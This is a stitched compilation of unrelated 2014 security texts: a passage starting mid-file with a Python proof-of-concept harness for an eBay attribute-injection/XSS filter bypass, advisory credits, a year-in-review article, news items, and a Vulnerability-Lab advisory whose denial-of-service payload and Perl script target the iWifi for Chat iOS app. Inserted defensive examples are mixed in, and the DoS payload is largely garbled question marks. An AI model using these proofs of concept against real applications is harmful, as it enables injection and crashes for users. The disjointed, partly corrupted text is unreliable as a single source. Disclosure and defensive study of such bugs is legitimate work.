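    return query.replace("<", "&lt;").replace(">", "&gt;")


def render_vulnerable(query):
    """Reflection as the advisory describes it; None means the filter blocked it."""
    filtered = naive_filter(query)
    if filtered is None:
        return None
    return '<input type="hidden" name="query" value="%s" />' % filtered


def render_fixed(query):
    """Hardened reflection: attribute-encode the whole value, quotes and
    ampersands included, so no injected text can start a new attribute."""
    return '<input type="hidden" name="query" value="%s" />' % html.escape(query, quote=True)


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser would assign to the <input> tag,
    with entities in attribute values decoded the way a real parser does."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parse_input_attrs(markup):
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    query = decode_query(POC_QUERY)
    print("vulnerable:", parse_input_attrs(render_vulnerable(query)))
    print("fixed:     ", parse_input_attrs(render_fixed(query)))
```

The lesson is the ordering: the substring filter runs on the URL-decoded parameter, but the browser performs one more decoding step (HTML entities) after reflection, so any filter that does not operate on the final decoded form is bypassable. Output encoding for the exact context (here, an HTML attribute) removes the problem regardless of what the input contains.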
Screenshots :
======================================================================
- http://www.asafety.fr/data/20140721-ebay_css_injection_01.png
Solution:
======================================================================
Fixed by eBay / PayPal / Magento security team.
Additional resources :
======================================================================
- http://www.ebay.com/
- http://ebay.com/securitycenter/ResearchersAcknowledgement.html
- http://www.asafety.fr/vuln-exploit-poc/contribution-ebay-css-injection-xss-potentielle/
- http://www.synetis.com/2014/08/22/contribution-securite-debay/
Report timeline :
======================================================================
2014-07-21 : eBay Team alerted with details and PoC.
2014-07-21 : eBay response and ack.
2014-07-21 : eBay validate the issue and awaiting fix.
2014-08-21 : eBay fixed the issue and acknowledgement
2014-08-22 : Public article on SYNETIS website.
2014-12-20 : Public article and PoC on ASafety website
2014-12-20 : Public advisory
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr -
A good hacker is one who doesn't advertise himself (i.e. stays underground).
A good hacker is not the one who breaks into a lot of sites; a good hacker is the one who protects himself!
-
The wonderful and terrifying thing about the security world is that things never stay calm for long. As soon as you think you have a chance to catch your breath, someone breaks something and it’s time to scramble again. In 2014, those small moments of downtime were hard to come by. There was a seemingly endless parade of major vulnerabilities, data breaches and high-profile hacks. It was a year filled with Heartbleeds, POODLEs, Shellshock and a lot of pain for users, administrators and anyone else who likes to do things on the Interweb. Thankfully, the network is still standing after all that, so we went back and looked at all the stories we did this year and picked out the 10 most popular ones, put a fresh coat of paint on them and put them together to give you a picture of the year that was in security. Enjoy.
PNG Image Metadata Leading to iFrame Injections
If there’s one thing attackers love, it’s Javascript. It’s the gift that keeps on giving and in 2014 one of the presents it gave us was the ability to deliver malware through the use of the metadata in an obfuscated PNG image file. Researchers at Sucuri discovered that some attackers were using the technique to trigger an iframe that calls the image’s metadata, which is outside the browser’s viewing area. The browser can still read the data though and can be used in drive-by downloads and other attacks. Easy workaround: Don’t look at pictures on the Internet.
Seriousness of OpenSSL Heartbleed Bug Sets In
As Code Red once was the standard for Internet worms, Heartbleed has become the bar to which other Internet-wide bugs must now aspire. The vulnerability in the heartbeat extension of OpenSSL caused Web-wide panic when it was disclosed in April and its effects are still being felt eight months later. OpenSSL is deployed in an untold number of products, and the bug affects both clients and servers, so attackers had a Cheesecake Factory menu of targets at their disposal. Rumors of Heartbleed’s discovery by the NSA appear to be exaggerated, but the bug can be blamed for starting the vulnerability-as-celebrity trend. So, thanks, Heartbleed.
Major Bash Vulnerability Affects Linux, UNIX, Mac OS X
These are not words you want to hear when a new vulnerability is disclosed: “It’s super simple and…It’s extremely serious.” That’s how a security engineer at Red Hat described the Shellshock flaw in the Bash command line tool, a bug that affected Unix, Linux and OS X and allows attackers to execute whatever code they want on target systems. Which, as it turns out, is undesirable. Vendors scrambled to patch their products, while hackers did what they do: hack. Shellshock also carried on the proud tradition of vulnerability branding and logo production.
Browser Vendors Move to Disable SSLv3 in Wake of POODLE Attack
2014 was not a great year for SSL. And by not great, we mean terrible. Really, really terrible. As if the Heartbleed bug wasn’t enough, in October researchers from Google revealed a new attack on SSLv3 that could let attackers decrypt secure connections in some circumstances. In response to the disclosure, browser vendors have begun disabling SSLv3 support, a move that was long overdue. The protocol is older than half the kids trying to exploit it using POODLE. But news came out recently that TLS—the replacement for SSL—is also vulnerable to the attack in some implementations. But the good news is, well, nothing.
Hacker Puts Hosting Service Code Spaces Out of Business
Most high-profile attacks these days result in data being stolen and sometimes leaked online (see: Sony). But in June we saw an attack on Code Spaces, a hosting and collaboration platform provider, that forced the company to go out of business. The company was hit with a DDoS attack that was quickly followed by a compromise of its Amazon EC2 control panel. The hackers destroyed the company’s data, including its backups, and Code Spaces informed customers within a few hours that it was going to cease operations. This kind of devastating attack is a rarity, but not unique.
Researcher Finds Tor Exit Node Adding Malware to Binaries
Tor has become a safe haven for people eager to protect the privacy of their online activities. In turn, hackers have taken to Tor not only to carry out DDoS and spam campaigns, but also to load malware on unsuspecting users’ machines. Security researcher Josh Pitts in October identified a Tor exit node that was surreptitiously adding malware to binaries users downloaded using the Tor browser. The exit node was subsequently flagged by the Tor Project, but not before it infected machines with code that opened ports listening for commands and sent HTTP requests to a remote server.
The Internet is Broken, Act Accordingly
Now that the curtain has been thrown back on the depth and breadth of government surveillance of Internet activities, the time has come to heed some cautious advice: Behave online as if someone is monitoring you—because they are. Security researchers are particularly aware of this dynamic because their work is of keen interest to intelligence outfits, hackers and defenders—all of whom would like to know what they know. No one can afford to be complacent or indifferent to Internet threats, whether they’re state-sponsored or criminally motivated. As Kaspersky Lab senior researcher Costin Raiu advises: The Internet is broken, act accordingly.
Passcode Bypass Bug and Email Attachment Encryption Plague iOS 7.1.1
An Egyptian neurosurgeon and self-proclaimed baseband hacker disclosed the details of an iPhone lockscreen bypass technique that allows an attacker in physical possession of an Apple iPhone 5 device running iOS 7.1.1 at the time to access contacts and make phone calls. The vulnerability allows an attacker to bypass not only the lockscreen, but also the new TouchID fingerprint sensor that arrived with the latest iPhones. The trick to beating these protections is to use the device’s voice-recognition program Siri, which, after some prompting, presented the good doctor with the ability to scroll through contacts. The Siri bug was a double whammy for Apple, which also had to deal with a separate issue in iOS 7.1.1 that prevented email attachments from being properly encrypted. Both issues were patched.
UltraDNS Dealing With DDoS Attack
Big DNS service provider UltraDNS in April was put on its heels having to beat back a DDoS attack that kept many of its customers offline. It was a hectic day for website operators who relied on UltraDNS’ services. Ultimately, it turned out that a massive 100 Gbps DDoS attack against one of UltraDNS’ customers resulted in latency issues for others. The attack against UltraDNS was just the latest volumetric DDoS attack to be reported. Attacks ranging between 70 Gbps and more than 400 Gbps were happening with greater frequency against high value financial targets, as well as core infrastructure providers such as UltraDNS. Many such DNS amplification attacks take advantage of the millions of open DNS resolvers listening online to amplify traffic exponentially, spoofing requests to the intended target. UltraDNS mitigated its situation within hours.
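A defender's view of the amplification pattern the paragraph describes, as an added example that is not from the article: a small detector run over constructed resolver log lines that flags source addresses repeatedly receiving answers far larger than their queries, which on an open resolver usually means the source address is a spoofed victim. The log format, the thresholds and the sample addresses are assumptions.

```python
"""Flag DNS amplification traffic in resolver query logs (added example, not from the article)."""
from collections import defaultdict

# Constructed sample lines; the format <client_ip> <qname> <qtype> <query_bytes> <response_bytes>
# is an assumption. 203.0.113.7 behaves like a real client; 198.51.100.5 looks like a
# spoofed victim address being fed large ANY answers it never asked for.
SAMPLE_LOG = """\
203.0.113.7 example.com A 44 60
203.0.113.7 mail.example.com MX 49 120
198.51.100.5 isc.org ANY 36 3223
198.51.100.5 isc.org ANY 36 3223
198.51.100.5 isc.org ANY 36 3223
198.51.100.5 isc.org ANY 36 3223
198.51.100.5 ripe.net ANY 36 2888
"""


def parse_line(line):
    """Split one log line into a record; query and response sizes become integers."""
    ip, qname, qtype, qbytes, rbytes = line.split()
    return {"ip": ip, "qname": qname, "qtype": qtype,
            "qbytes": int(qbytes), "rbytes": int(rbytes)}


def find_amplification_sources(log_text, min_factor=20.0, min_queries=3):
    """Return {source_ip: summary} for addresses that repeatedly receive answers
    at least min_factor times larger than their queries. The thresholds are
    assumptions; a normal client rarely exceeds a factor of a few."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        factors = [r["rbytes"] / r["qbytes"] for r in recs]
        if sum(1 for f in factors if f >= min_factor) >= min_queries:
            flagged[ip] = {
                "queries": len(recs),
                "avg_factor": round(sum(factors) / len(factors), 1),
                "bytes_reflected": sum(r["rbytes"] for r in recs),
                "qtypes": sorted({r["qtype"] for r in recs}),
            }
    return flagged


if __name__ == "__main__":
    # A resolver operator would rate-limit responses to these addresses and close the
    # resolver to the open Internet; the spoofed address is the victim, not the attacker.
    for ip, summary in find_amplification_sources(SAMPLE_LOG).items():
        print(ip, summary)
```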
Audit Project Releases Verified Repositories of TrueCrypt 7.1A
In a year of bizarre stories, hacks and Internet-wide vulnerabilities, there may not have been a stranger story than the abrupt shutdown in May of TrueCrypt, the popular open source encryption software package. TrueCrypt’s maintainers’ decision to shut down the project kicked off speculation about whether the software had been hacked or infiltrated by the National Security Agency. In an attempt to get some answers, the Open Crypto Audit Project was formed with the express mission of auditing the TrueCrypt code looking for a backdoor. In June, OCAP posted a verified repository of TrueCrypt 7.1a, the last known good TrueCrypt archive. The experts involved in the project created the verified repository by comparing the SHA2 hashes with files found in other TrueCrypt repositories, ensuring their integrity.
-
@MrGrj with this post you did nothing but give those losers satisfaction (they get to feel like somebody too)
People like that should not be given any attention!
-
Computers at a nuclear power plant in South Korea have been compromised by a hacker, but the plant's operator says no critical data has been leaked.
The hacker was able to access blueprints, floor maps and other information on the plant, the South Korean Yonhap News Agency reported Sunday. Using a Twitter account called "president of anti-nuclear reactor group," the hacker has released a total of four postings of the leaked data since December 15, each one revealing internal designs and manuals of the Gori-2 and Wolsong-1 nuclear reactors run by Korea Hydro and Nuclear Power Co. (KHNP), Yonhap added. The hacker has threatened to leak further information unless the reactors are shut down.
KHNP has insisted that the leaked information is not critical and does not undermine the safety of the reactors. The company also played down the threat of any type of cyberattack, saying that the reactors' controllers are protected because they're not linked to any external networks, according to the Wall Street Journal.
The hacking against KHNP nuclear plants occurs in the midst of a major hack against Sony Pictures over its movie "The Interview," a comedy about an assassination attempt against North Korean leader Kim Jong-un. The FBI has accused North Korea of orchestrating the Sony hack, though the country has denied any involvement. As a further response, North Korea suggested a joint investigation into the hack with the US but then accused the US of being involved in the making of the film, according to The Guardian.
Despite the increased tension, no fingers have been pointed at North Korea for the hacking against the KHNP power plants. An official at KHNP told Reuters that the hacking appeared to be the work of "elements who want to cause social unrest," but added that he had no one specific in mind.
Government officials looking into the incident were able to trace the hacker's IP address to a PC located in a specific location, Yonhap said. Investigators have been sent to the location as well as to the plant's reactors to probe further.
-
Apple is updating its Macs to guard against hackers taking control -- the first time a Mac update has been sent out automatically without requiring your permission.
The automated security update protects Apple laptops and desktops from newly discovered security vulnerability CVE-2014-9295, which affects OS X and other Linux and Unix distributions.
Speaking to Reuters, Apple spokesperson Bill Evans described Monday's update as "seamless" and noted that Mac users don't even need to restart their computers.
Apple isn't the only company that could be vulnerable to the security bug, which was revealed Friday by the US Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. Researchers warn that vulnerabilities in a computer's network time protocol (NTP), which sync a computer's clocks, could allow hackers to take control of a computer remotely.
"Apple's proactive steps to automatically remediate this particular vulnerability shows the need to quickly patch remotely exploitable vulnerabilities," says security analyst Ken Westin of Tripwire. "However, the use of Apple's automatic deployment tool is not without risks, as even the simplest update can cause problems for some systems. In this case the update may have been so minor the risk of affecting other applications and processes was minimal."
Previously, Apple's security updates have required a computer user to accept the update. The company has actually had a method to automatically update computers for two years but is only now using it for the first time.
What if someone doesn't want automatic updates? Westin advises: "If you have a Mac system where an automatic update might introduce a problem -- or you are the paranoid type -- it can be disabled by going to the Apple Menu > System Preferences > App Store and unchecking Install system data files and security updates."
-
Document Title:
===============
iWifi for Chat v1.1 iOS - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1375
Release Date:
=============
2014-12-16
Vulnerability Laboratory ID (VL-ID):
====================================
1376
Common Vulnerability Scoring System:
====================================
4.6
Product & Service Introduction:
===============================
iWifi for Chat lets you easily chat with your friends over Wifi in a fast and reliable way.
The app is part of a bundle and is made by the seller iOS Developer.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/iwifi-for-chat/id512703175 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a remote denial of service vulnerability in the iWifi for Chat v1.1 iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2014-12-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
iOS Developer
Product: iWifi for Chat - iOS Web Application 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote denial of service vulnerability has been discovered in the official iWifi for Chat v1.1 iOS web-application.
The vulnerability allows remote attackers to shut down the service application by sending a specially crafted chat message.
The vulnerability is located in the application message input context. Remote attackers are able to inject special chars
to provoke an error that results in an app shutdown. The bug can be exploited by sending specially crafted symbol
messages through the context message input box. The vulnerability allows an attacker to crash the connected remote iOS client.
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring
system) count of 4.6. Exploitation of the DoS vulnerability requires no privileged application user account but a connected
chat user for interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise
and affected or connected device component compromise.
Vulnerable Module(s):
[+] Chat Message Input Box
Vulnerable Parameter(s):
[+] message context
Affected Module(s):
[+] iWifi for Chat v1.1
Proof of Concept (PoC):
=======================
The Vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: 1024 bytes - message context payload
?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬??????????????
???????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????
PoC: Exploit
#!/usr/local/bin/perl
open (MYFILE, '>>exploitcode.txt');
print MYFILE "?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬
?????????????????????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????\n";
close (MYFILE);
Security Risk:
==============
The security risk of the denial of service web vulnerability is estimated as medium. (CVSS 4.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
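The defensive counterpart to the bug the advisory above describes, as an added example that is not the app's code: a receiving-side validator that rejects malformed or hostile message bytes before they reach the client's rendering path. The byte and character caps, the allowed control characters and the rejected Unicode categories are assumptions; the advisory does not say which symbols trigger the crash.

```python
"""Receiving-side validation for chat messages (added example, not the app's code)."""
import unicodedata

MAX_BYTES = 1024   # assumed wire limit; the advisory's payload is exactly this size
MAX_CHARS = 512    # assumed cap on code points after normalization

# Unicode categories rejected outright (assumption): control, surrogate,
# private-use and unassigned code points have no place in a chat line.
REJECTED_CATEGORIES = {"Cc", "Cs", "Co", "Cn"}
ALLOWED_CONTROLS = {"\n", "\t"}
# Bidirectional overrides and isolates (category Cf) that can reorder displayed text.
BIDI_CONTROLS = {chr(c) for c in range(0x202A, 0x202F)} | {chr(c) for c in range(0x2066, 0x206A)}


class InvalidMessage(ValueError):
    """Raised for any message the client should drop instead of rendering."""


def validate_message(raw: bytes) -> str:
    """Return the NFC-normalized text of a well-formed message, or raise InvalidMessage."""
    if len(raw) > MAX_BYTES:
        raise InvalidMessage("message too long: %d bytes" % len(raw))
    try:
        # strict decoding rejects truncated sequences, overlong forms and encoded surrogates
        text = raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise InvalidMessage("not valid UTF-8: %s" % exc) from None
    text = unicodedata.normalize("NFC", text)
    if len(text) > MAX_CHARS:
        raise InvalidMessage("message too long: %d code points" % len(text))
    for ch in text:
        cat = unicodedata.category(ch)
        if (cat in REJECTED_CATEGORIES and ch not in ALLOWED_CONTROLS) or ch in BIDI_CONTROLS:
            raise InvalidMessage("rejected code point U+%04X (%s)" % (ord(ch), cat))
    return text


def is_safe(raw: bytes) -> bool:
    """Yes/no form of validate_message for callers that only need a decision."""
    try:
        validate_message(raw)
    except InvalidMessage:
        return False
    return True


if __name__ == "__main__":
    # Constructed samples: a normal message with an emoji, then malformed or hostile inputs.
    for sample in (b"hi there \xf0\x9f\x98\x80", b"\xff\xfe", b"abc\x00def",
                   "x\u202ey".encode(), b"\xcd\xb8", b"a" * (MAX_BYTES + 1)):
        print(sample[:16], "ok" if is_safe(sample) else "rejected")
```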
HP’s Zero Day Initiative Changes Bug-Buying Guidelines
HP’s Zero Day Initiative has decided to adjust its guidelines and criteria for buying some vulnerabilities in the future, eliminating some large classes of bugs from its menu.
The group, which has been among the more visible and prominent of the vulnerability purchasing programs since its inception several years ago, has decided that it will no longer pay for several kinds of bugs, including ActiveX flaws, most denial-of-service vulnerabilities and post-authentication SQL injection bugs. One exception to the ActiveX policy, however, is that the ZDI will still purchase ActiveX flaws related to SCADA systems.
ZDI was among the first of the corporate vulnerability buying programs to succeed and have a broad effect on the industry. The program has been a key sponsor of the Pwn2Own hacking contest at CanSecWest for many years, as well. ZDI still plans to buy most of the common vulnerability classes it has paid for in the past.
“As always, we are looking first at software that is most widely deployed, and especially that which is most widely deployed in the enterprise. We are looking for critical-class vulnerability reports. For example, we are still buying browser bugs, SCADA bugs, operating-system privilege escalations, sandbox escapes, and most security-product vulnerabilities,” Shannon Sabens of HP said in a blog post.
The change in guidelines may reflect the shift in the broader research and hacking communities toward high-value targets such as SCADA systems, sandboxes and others. Attackers have been focusing their energy on browsers and sandbox escapes for years now, and increasingly are turning their attention to SCADA and industrial control systems, as well. The number of researchers who work on SCADA and related topics is tiny relative to the number who focus on Web or application security, but security advisories for ICS and SCADA products are becoming much more common.